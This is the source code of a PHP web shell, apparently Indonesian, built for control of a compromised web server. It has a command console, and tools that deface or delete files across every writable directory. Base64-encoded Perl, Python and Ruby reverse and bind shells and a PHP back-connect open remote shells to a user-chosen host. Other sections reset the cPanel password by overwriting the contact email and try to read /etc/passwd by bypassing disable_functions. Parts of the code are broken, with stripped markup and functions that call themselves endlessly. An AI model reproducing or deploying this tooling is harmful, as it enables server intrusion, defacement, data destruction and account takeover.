" . $_SERVER['HTTP_HOST'] . "

" . $p . ""; } else { return "" . $p . ""; } } function swall($swa, $text, $dir) { echo ""; } function exe($cmd) { if (function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } } function ok() { echo '

'; } function er() { echo '

'; } function sz($byt) { $sz = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $byt >= 1024 && $i < (count($sz) - 1); $byt /= 1024, $i++); return (round($byt, 2) . " " . $sz[$i]); } function ip() { $ipas = ''; if (getenv('HTTP_CLIENT_IP')) $ipas = getenv('HTTP_CLIENT_IP'); else if (getenv('HTTP_X_FORWARDED_FOR')) $ipas = getenv('HTTP_X_FORWARDED_FOR'); else if (getenv('HTTP_X_FORWARDED')) $ipas = getenv('HTTP_X_FORWARDED'); else if (getenv('HTTP_FORWARDED_FOR')) $ipas = getenv('HTTP_FORWARDED_FOR'); else if (getenv('HTTP_FORWARDED')) $ipas = getenv('HTTP_FORWARDED'); else if (getenv('REMOTE_ADDR')) $ipas = getenv('REMOTE_ADDR'); else $ipas = 'IP tidak dikenali'; return $ipas; } function p($file) { if ($p = @fileperms($file)) { $i = 'u'; if (($p & 0xC000) == 0xC000) $i = 's'; elseif (($p & 0xA000) == 0xA000) $i = 'l'; elseif (($p & 0x8000) == 0x8000) $i = '-'; elseif (($p & 0x6000) == 0x6000) $i = 'b'; elseif (($p & 0x4000) == 0x4000) $i = 'd'; elseif (($p & 0x2000) == 0x2000) $i = 'c'; elseif (($p & 0x1000) == 0x1000) $i = 'p'; $i .= ($p & 00400) ? 'r' : '-'; $i .= ($p & 00200) ? 'w' : '-'; $i .= ($p & 00100) ? 'x' : '-'; $i .= ($p & 00040) ? 'r' : '-'; $i .= ($p & 00020) ? 'w' : '-'; $i .= ($p & 00010) ? 'x' : '-'; $i .= ($p & 00004) ? 'r' : '-'; $i .= ($p & 00002) ? 'w' : '-'; $i .= ($p & 00001) ? 'x' : '-'; return $i; } else return "- ?? -"; } echo " " . $_SERVER['HTTP_HOST'] . " - $author

$author Shell

"; if (isset($_GET['path'])) { $path = $_GET['path']; } else { $path = getcwd(); } $path = str_replace('\\', '/', $path); $paths = explode('/', $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo '

: /'; continue; } if ($pat == '') continue; echo '' . $pat . '/'; } echo " [ " . ▟($path, p($path)) . " ]

"; echo "

upload mass deface mass delete console info server back conect bypass etc/passwd reset cpanel

"; // tools nya if (isset($_GET['path'])) { $dir = $_GET['path']; chdir($dir); } else { $dir = getcwd(); } $dir = str_replace("\\", "/", $dir); $scdir = explode("/", $dir); for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } elseif ($_GET['id'] == 'deface') { echo "$_s"; function mass_kabeh($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc . '/' . $namafile; if ($dirb === '.') { file_put_contents($▚, $isi_script); } elseif ($dirb === '..') { file_put_contents($▚, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[] $▚
"; file_put_contents($▚, $isi_script); $▟ = mass_kabeh($dirc, $namafile, $isi_script); } } } } } } function mass_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc . '/' . $namafile; if ($dirb === '.') { file_put_contents($▚, $isi_script); } elseif ($dirb === '..') { file_put_contents($▚, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[] $dirb/$namafile
"; file_put_contents($▚, $isi_script); } } } } } } if ($_POST['start']) { if ($_POST['tipe'] == 'massal') { mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']); } elseif ($_POST['tipe'] == 'biasa') { mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); } echo "
"; } echo "

"; } elseif ($_GET['id'] == 'cmd') { if ($_POST['ekseCMD']) { $cmd = $_POST['ekseCMD']; } echo "$_s

$_x Console

~$ $cmd
";
        system($_POST['ekseCMD'] . ' 2>&1');
        echo "

"; } elseif ($_GET['id'] == 'info') { $disfunc = @ini_get("disable_functions"); if (empty($disfunc)) { $disfc = "NONE"; } else { $disfc = "$disfunc"; } if (!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $mysql = (function_exists('mysqli_connect')) ? 'ON' : 'OFF'; $curl = (function_exists('curl_version')) ? 'ON' : 'OFF'; $mail = (function_exists('mail')) ? 'ON' : 'OFF'; $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; echo "$_s

$_x Info server
Uname: " . php_uname() . "
Software: " . $_SERVER['SERVER_SOFTWARE'] . "
PHP version: " . PHP_VERSION . " [ PHP INFO ] PHP os: " . PHP_OS . "
Server Ip: " . gethostbyname($_SERVER['HTTP_HOST']) . "
Your Ip: " . ip() . "
User: $user ($uid) | Group: $group ($gid)
Safe Mode: $sm
Mysqli : $mysql
Curl : $curl
Mail : $mail
Disable Function:

$disfc

"; } elseif ($_GET['id'] == 'phpinfo') { @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff, "") + 6; $akhir = strpos($buff, ""); echo "

" . substr($buff, $awal, $akhir - $awal) . "

"; exit; } elseif ($_GET['id'] == 'upload') { echo "$_s

"; if (isset($_FILES['file'])) { if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) { echo 'Upload ok! ' . ok() . '

'; } else { echo 'Upload gagal! ' . er() . '

'; } } echo "

"; } elseif ($_GET['id'] == 'filebaru') { echo "$_s"; if (isset($_POST['bikin'])) { $name = $_POST['nama_file']; $isi_file = $_POST['isi_file']; foreach ($name as $nama_file) { $handle = @fopen("$nama_file", "w"); if ($isi_file) { $buat = @fwrite($handle, $isi_file); } else { $buat = $handle; } } if ($buat) { echo 'Buat file ok! ' . ok() . '

'; } else { echo 'Buat file gagal! ' . er() . '

'; } } echo "

$_x Buat file

"; } elseif ($_GET['id'] == 'dirbaru') { echo "$_s"; if (isset($_POST['buat'])) { $nama = $_POST['nama_dir']; foreach ($nama as $nama_dir) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_dir); $fd = @mkdir($folder); } if ($fd) { echo 'Buat dir ok! ' . ok() . ''; } else { echo 'Buat dir gagal! ' . er() . ''; } } echo "

$_x Buat dir

"; } elseif ($_GET['id'] == 'backconect') { echo "
"; function bcTool($dir, $file) { bcTool($dir, $file); if ($_POST['bpl']) { $bp = base64_decode('IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0='); $brt = @fopen('bp.pl', 'w'); fwrite($brt, $bp); $out = exe('perl bp.pl ' . $_POST['port'] . ' 1>/dev/null 2>&1 &'); sleep(1); echo "

$out\n" . exe('ps aux | grep bp.pl') . '

'; unlink('bp.pl'); } if ($_POST['backconnect'] == 'perl') { $bc = base64_decode('IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7'); $plbc = @fopen('bc.pl', 'w'); fwrite($plbc, $bc); $out = exe('perl bc.pl ' . $_POST['server'] . ' ' . $_POST['port'] . ' 1>/dev/null 2>&1 &'); sleep(1); echo "

$out\n" . exe('ps aux | grep bc.pl') . '

'; unlink('bc.pl'); } if ($_POST['backconnect'] == 'python') { $becaa = base64_decode('IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk='); $pbcaa = @fopen('bcpyt.py', 'w'); fwrite($pbcaa, $becaa); $out1 = exe('python bcpyt.py ' . $_POST['server'] . ' ' . $_POST['port']); sleep(1); echo "

$out1\n" . exe('ps aux | grep bcpyt.py') . '

'; unlink('bcpyt.py'); } if ($_POST['backconnect'] == 'ruby') { $becaak = base64_decode('IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k'); $pbcaak = @fopen('bcruby.rb', 'w'); fwrite($pbcaak, $becaak); $out2 = exe('ruby bcruby.rb ' . $_POST['server'] . ' ' . $_POST['port']); sleep(1); echo "

$out2\n" . exe('ps aux | grep bcruby.rb') . '

'; unlink('bcruby.rb'); } if ($_POST['backconnect'] == 'php') { $ip = $_POST['server']; $port = $_POST['port']; $sockfd = fsockopen($ip, $port, $errno, $errstr); if ($errno != 0) { echo "$errno : $errstr"; } elseif (!$sockfd) { $result = '

Unexpected error has occured, connection may have failed.

'; } else { fwrite($sockfd, " \n{#######################################} \n..:: BackConnect PHP By Con7ext ::.. \n{#######################################}\n"); $dir = @shell_exec('pwd'); $sysinfo = @shell_exec('uname -a'); $time = @shell_exec('time'); $len = 1337; fwrite($sockfd, 'User ', $sysinfo, 'connected @ ', $time, "\n\n"); while (!feof($sockfd)) { $cmdPrompt = '[kuda]#:> '; @fwrite($sockfd, $cmdPrompt); $command = fgets($sockfd, $len); @fwrite($sockfd, "\n" . @shell_exec($command) . "\n\n"); } @fclose($sockfd); } } } } elseif ($_GET['id'] == 'cpanel') { echo '

Auto Reset Password Cpanel

'; if (isset($_POST['submit'])) { $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); $email = $_POST['email']; $wr = 'email:' . $email; $f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/' . $user . '/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); $parm = $site . ':2082/resetpass?start=1'; echo '
Url: ' . $parm . ''; echo '
Username: ' . $user . ''; echo '
Success Reset To: ' . $email . '

'; } } elseif ($_GET['id'] == 'bypass') { echo '

'; function bcBypass($dir, $file) { bcBypass($dir, $file); $mail = 'ls /var/mail'; $paswd = '/etc/passwd'; if ($_POST['syst']) { echo "
'; } if ($_POST['passth']) { echo "
'; } if ($_POST['ex']) { echo "
'; } if ($_POST['shex']) { echo "
'; } if ($_POST['melex']) { echo "
'; } if ($_POST['awkuser']) { echo "
'; } if ($_POST['systuser']) { echo "
'; } if ($_POST['passthuser']) { echo "
'; } if ($_POST['exuser']) { echo "
'; } if ($_POST['shexuser']) { echo "
'; } } } elseif ($_GET['id'] == 'delete') { echo "$_s"; function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc . '/' . $namafile; if ($dirb === '.') { if (file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif ($dirb === '..') { if (file_exists("" . dirname($dir) . "/$namafile")) { unlink("" . dirname($dir) . "/$namafile"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($▚)) { echo "[] $▚
"; unlink($▚); $▟ = hapus_massal($dirc, $namafile); } } } } } } } if ($_POST['start']) { hapus_massal($_POST['d_dir'], $_POST['d_file']); echo "
"; } echo "

"; } } // akhir tools if (isset($_GET['filesrc'])) { echo "
name : " . basename($_GET['filesrc']); "
"; echo '

' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '

'; } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') { echo '
name : ' . basename($_POST['path']); '
'; //rename file if ($_POST['opt'] == 'rename') { if (isset($_POST['newname'])) { if (rename($_POST['path'], $path . '/' . $_POST['newname'])) { echo 'Rename ok! ' . ok() . '

'; } else { echo 'Rename gagal! ' . er() . ''; } $_POST['name'] = $_POST['newname']; } echo ' '; } elseif ($_POST['opt'] == 'edit') { if (isset($_POST['src'])) { $fp = fopen($_POST['path'], 'w'); if (fwrite($fp, $_POST['src'])) { echo 'Edit ok! ' . ok() . ''; } else { echo 'Edit gagal! ' . er() . ''; } fclose($fp); } echo '
'; } } else { //delete dir & file if (isset($_GET['option']) && $_POST['opt'] == 'delete') { if ($_POST['type'] == 'dir') { if (rmdir($_POST['path'])) { echo 'Delete dir ok! ' . ok() . ''; } else { echo 'Delete dir gagal! ' . er() . ''; } } elseif ($_POST['type'] == 'file') { if (unlink($_POST['path'])) { echo 'Delete file ok! ' . ok() . ''; } else { echo 'Delete file gagal! ' . er() . ''; } } } $scandir = scandir($path); $pa = getcwd(); echo '

'; foreach ($scandir as $dir) { $dt = date("Y-m-d H:i:s", filemtime("$path/$dir")); if (function_exists('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$path/$dir")); $downer = $downer['name']; } else { $downer = fileowner("$path/$dir"); } if (function_exists('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$path/$dir")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$path/$dir"); } if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo " '; echo " "; } foreach ($scandir as $file) { $ft = date("Y-m-d H:i:s", filemtime("$path/$file")); if (!is_file($path . '/' . $file)) continue; if (function_exists('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$path/$file")); $fowner = $fowner['name']; } else { $fowner = fileowner("$path/$file"); } if (function_exists('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$path/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$path/$file"); } echo " '; echo " "; } } echo "

name	last edit	size	owner:downer	permission	options
..
$dir	$dt	dir	$downer:$dgrp	"; if (is_writable("$path/$dir")) echo ''; elseif (!is_readable("$path/$dir")) echo ''; echo p("$path/$dir"); if (is_writable("$path/$dir") \|\| !is_readable("$path/$dir")) echo '
$file	$ft	" . sz(filesize($file)) . "	$fowner:$fgrp	"; if (is_writable("$path/$file")) echo ''; elseif (!is_readable("$path/$file")) echo ''; echo p("$path/$file"); if (is_writable("$path/$file") \|\| !is_readable("$path/$file")) echo '

$author Shell

Back-Connect